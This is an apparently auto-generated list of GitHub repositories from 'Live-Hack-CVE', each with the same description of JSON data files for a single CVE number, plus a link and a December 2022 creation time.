**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25304 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25304](https://github.com/Live-Hack-CVE/CVE-2022-25304) create time: 2022-12-26T02:38:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2043 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2043](https://github.com/Live-Hack-CVE/CVE-2022-2043) create time: 2022-12-26T02:38:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20368 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20368](https://github.com/Live-Hack-CVE/CVE-2022-20368) create time: 2022-12-26T02:37:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36045](https://github.com/Live-Hack-CVE/CVE-2022-36045) create time: 2022-12-26T02:37:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29804](https://github.com/Live-Hack-CVE/CVE-2022-29804) create time: 2022-12-26T02:37:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37023 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37023](https://github.com/Live-Hack-CVE/CVE-2022-37023) create time: 2022-12-26T02:37:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37022 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37022](https://github.com/Live-Hack-CVE/CVE-2022-37022) create time: 2022-12-26T02:37:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2132 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2132](https://github.com/Live-Hack-CVE/CVE-2022-2132) create time: 2022-12-26T02:37:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2044 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2044](https://github.com/Live-Hack-CVE/CVE-2022-2044) create time: 2022-12-26T02:37:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1198 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1198](https://github.com/Live-Hack-CVE/CVE-2022-1198) create time: 2022-12-26T02:37:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1199 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1199](https://github.com/Live-Hack-CVE/CVE-2022-1199) create time: 2022-12-26T02:37:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27563 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27563](https://github.com/Live-Hack-CVE/CVE-2022-27563) create time: 2022-12-26T02:37:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37176 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37176](https://github.com/Live-Hack-CVE/CVE-2022-37176) create time: 2022-12-26T02:37:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36552 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36552](https://github.com/Live-Hack-CVE/CVE-2022-36552) create time: 2022-12-26T02:37:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36563 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36563](https://github.com/Live-Hack-CVE/CVE-2022-36563) create time: 2022-12-26T02:37:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26331 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26331](https://github.com/Live-Hack-CVE/CVE-2022-26331) create time: 2022-12-26T02:36:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26330 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26330](https://github.com/Live-Hack-CVE/CVE-2022-26330) create time: 2022-12-26T02:36:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36562](https://github.com/Live-Hack-CVE/CVE-2022-36562) create time: 2022-12-26T02:36:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1247 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1247](https://github.com/Live-Hack-CVE/CVE-2022-1247) create time: 2022-12-26T02:36:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1205 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1205](https://github.com/Live-Hack-CVE/CVE-2022-1205) create time: 2022-12-26T02:36:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1508 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1508](https://github.com/Live-Hack-CVE/CVE-2022-1508) create time: 2022-12-26T02:36:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2520 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2520](https://github.com/Live-Hack-CVE/CVE-2022-2520) create time: 2022-12-26T02:36:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2519 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2519](https://github.com/Live-Hack-CVE/CVE-2022-2519) create time: 2022-12-26T02:36:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2485 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2485](https://github.com/Live-Hack-CVE/CVE-2022-2485) create time: 2022-12-26T02:36:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2466 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2466](https://github.com/Live-Hack-CVE/CVE-2022-2466) create time: 2022-12-26T02:36:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2220 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2220](https://github.com/Live-Hack-CVE/CVE-2022-2220) create time: 2022-12-26T02:36:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20066 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20066](https://github.com/Live-Hack-CVE/CVE-2022-20066) create time: 2022-12-26T00:43:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-2577 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-2577](https://github.com/Live-Hack-CVE/CVE-2008-2577) create time: 2022-12-26T00:02:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-2578 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-2578](https://github.com/Live-Hack-CVE/CVE-2008-2578) create time: 2022-12-26T00:02:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4858 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4858](https://github.com/Live-Hack-CVE/CVE-2015-4858) create time: 2022-12-26T01:24:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4830 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4830](https://github.com/Live-Hack-CVE/CVE-2015-4830) create time: 2022-12-26T01:24:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4870](https://github.com/Live-Hack-CVE/CVE-2015-4870) create time: 2022-12-26T01:24:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4815 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4815](https://github.com/Live-Hack-CVE/CVE-2015-4815) create time: 2022-12-26T01:23:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4816 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4816](https://github.com/Live-Hack-CVE/CVE-2015-4816) create time: 2022-12-26T01:23:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4826 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4826](https://github.com/Live-Hack-CVE/CVE-2015-4826) create time: 2022-12-26T01:23:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-2648 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-2648](https://github.com/Live-Hack-CVE/CVE-2015-2648) create time: 2022-12-26T01:23:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-2643 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-2643](https://github.com/Live-Hack-CVE/CVE-2015-2643) create time: 2022-12-26T01:23:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4752 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4752](https://github.com/Live-Hack-CVE/CVE-2015-4752) create time: 2022-12-26T01:23:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-2571 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-2571](https://github.com/Live-Hack-CVE/CVE-2015-2571) create time: 2022-12-26T01:23:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-2573 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-2573](https://github.com/Live-Hack-CVE/CVE-2015-2573) create time: 2022-12-26T01:23:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-2582 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-2582](https://github.com/Live-Hack-CVE/CVE-2015-2582) create time: 2022-12-26T01:23:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0502 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0502](https://github.com/Live-Hack-CVE/CVE-2016-0502) create time: 2022-12-26T01:23:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5114 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5114](https://github.com/Live-Hack-CVE/CVE-2019-5114) create time: 2022-12-26T00:38:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10219 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10219](https://github.com/Live-Hack-CVE/CVE-2019-10219) create time: 2022-12-26T00:32:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-25076 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-25076](https://github.com/Live-Hack-CVE/CVE-2019-25076) create time: 2022-12-25T23:19:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20230 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20230](https://github.com/Live-Hack-CVE/CVE-2020-20230) create time: 2022-12-26T01:22:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36189 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36189](https://github.com/Live-Hack-CVE/CVE-2020-36189) create time: 2022-12-26T01:22:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35491](https://github.com/Live-Hack-CVE/CVE-2020-35491) create time: 2022-12-26T01:22:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35490 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35490](https://github.com/Live-Hack-CVE/CVE-2020-35490) create time: 2022-12-26T01:22:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6917 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6917](https://github.com/Live-Hack-CVE/CVE-2020-6917) create time: 2022-12-26T01:22:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6922](https://github.com/Live-Hack-CVE/CVE-2020-6922) create time: 2022-12-26T01:22:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6921 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6921](https://github.com/Live-Hack-CVE/CVE-2020-6921) create time: 2022-12-26T01:22:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6920 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6920](https://github.com/Live-Hack-CVE/CVE-2020-6920) create time: 2022-12-26T01:22:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6919 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6919](https://github.com/Live-Hack-CVE/CVE-2020-6919) create time: 2022-12-26T01:22:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6918](https://github.com/Live-Hack-CVE/CVE-2020-6918) create time: 2022-12-26T01:22:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21516 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21516](https://github.com/Live-Hack-CVE/CVE-2020-21516) create time: 2022-12-26T01:20:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27784 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27784](https://github.com/Live-Hack-CVE/CVE-2020-27784) create time: 2022-12-26T01:16:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8617 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8617](https://github.com/Live-Hack-CVE/CVE-2020-8617) create time: 2022-12-26T00:42:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15476 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15476](https://github.com/Live-Hack-CVE/CVE-2020-15476) create time: 2022-12-26T00:40:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15472 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15472](https://github.com/Live-Hack-CVE/CVE-2020-15472) create time: 2022-12-26T00:40:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19914 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19914](https://github.com/Live-Hack-CVE/CVE-2020-19914) create time: 2022-12-26T00:39:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24654](https://github.com/Live-Hack-CVE/CVE-2020-24654) create time: 2022-12-26T00:33:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16116 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16116](https://github.com/Live-Hack-CVE/CVE-2020-16116) create time: 2022-12-26T00:33:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13514 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13514](https://github.com/Live-Hack-CVE/CVE-2020-13514) create time: 2022-12-25T23:59:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13515 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13515](https://github.com/Live-Hack-CVE/CVE-2020-13515) create time: 2022-12-25T23:59:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13519 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13519](https://github.com/Live-Hack-CVE/CVE-2020-13519) create time: 2022-12-25T23:59:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13518 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13518](https://github.com/Live-Hack-CVE/CVE-2020-13518) create time: 2022-12-25T23:59:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13512 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13512](https://github.com/Live-Hack-CVE/CVE-2020-13512) create time: 2022-12-25T23:59:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13513 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13513](https://github.com/Live-Hack-CVE/CVE-2020-13513) create time: 2022-12-25T23:59:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13516 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13516](https://github.com/Live-Hack-CVE/CVE-2020-13516) create time: 2022-12-25T23:59:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13517 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13517](https://github.com/Live-Hack-CVE/CVE-2020-13517) create time: 2022-12-25T23:59:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13510 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13510](https://github.com/Live-Hack-CVE/CVE-2020-13510) create time: 2022-12-25T23:59:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13511 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13511](https://github.com/Live-Hack-CVE/CVE-2020-13511) create time: 2022-12-25T23:58:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8445 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8445](https://github.com/Live-Hack-CVE/CVE-2020-8445) create time: 2022-12-25T23:58:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8446 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8446](https://github.com/Live-Hack-CVE/CVE-2020-8446) create time: 2022-12-25T23:58:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38554 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38554](https://github.com/Live-Hack-CVE/CVE-2021-38554) create time: 2022-12-26T01:22:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43998 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43998](https://github.com/Live-Hack-CVE/CVE-2021-43998) create time: 2022-12-26T01:21:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45042 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45042](https://github.com/Live-Hack-CVE/CVE-2021-45042) create time: 2022-12-26T01:21:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27668 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27668](https://github.com/Live-Hack-CVE/CVE-2021-27668) create time: 2022-12-26T01:21:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37219 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37219](https://github.com/Live-Hack-CVE/CVE-2021-37219) create time: 2022-12-26T01:21:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41802](https://github.com/Live-Hack-CVE/CVE-2021-41802) create time: 2022-12-26T01:21:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38297 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38297](https://github.com/Live-Hack-CVE/CVE-2021-38297) create time: 2022-12-26T01:21:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43565 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43565](https://github.com/Live-Hack-CVE/CVE-2021-43565) create time: 2022-12-26T01:19:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36829 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36829](https://github.com/Live-Hack-CVE/CVE-2021-36829) create time: 2022-12-26T01:19:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28398 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28398](https://github.com/Live-Hack-CVE/CVE-2021-28398) create time: 2022-12-26T01:17:10Z

